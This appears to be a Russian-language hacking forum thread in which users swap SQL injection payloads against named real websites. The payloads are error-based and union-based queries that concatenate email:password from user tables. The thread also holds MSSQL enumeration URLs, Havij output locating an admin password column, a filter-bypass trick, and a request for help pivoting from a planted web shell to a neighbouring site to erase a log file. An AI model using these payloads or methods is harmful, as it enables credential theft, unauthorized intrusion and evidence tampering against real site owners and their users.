а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс но я столкнулся с такой проблемой, при такой конструкции concat_ws(0x3a,email,password) выводит ошибку PHP: Illegal mix of collations (binary,COERCIBLE), (latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,IMPLICIT) for operation 'concat_ws' как можно ещо попробовать вывести в нужном для меня виде?
PHP: http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhex(hex(concat_ws(0x3a,email,password)))+from+user+limit+1,1),floor(rand(0)*2))having+min(0)+or+1--+
о, спасибо, а чё ето за чудо конструкция?? http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+ где я могу почитать о том что ето (@x:=0x 00) и тп, означает?
Подскажите, здесь есть уязвимость, или только раскрытие путей: saturn.net/contacts.php?id=4%27 уж больно пути странные пишет...
Подскажите... есть сайт, есть форма. Фильтр на иньекцию - Code: function is_secure($string) { //todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9) $pattern = "#[^A-Za-z0-9]#"; if(@preg_match($pattern,$string)==true) return false; else return true; } Если делаем так : Code: <input name="u" id="input" value="Username[]" type="text" maxlength="12" /><br /><br /> preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?
Только раскрытие путей. Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например: http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+ http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Latin1_General_Cp1254_CS_AS)+and+1=1 а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bchar(101)%2bchar(114)) is 6 Column found: FullName Column found: id Column found: isEnabled Column found: isSuperUser Column found: Login Column found: Password
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.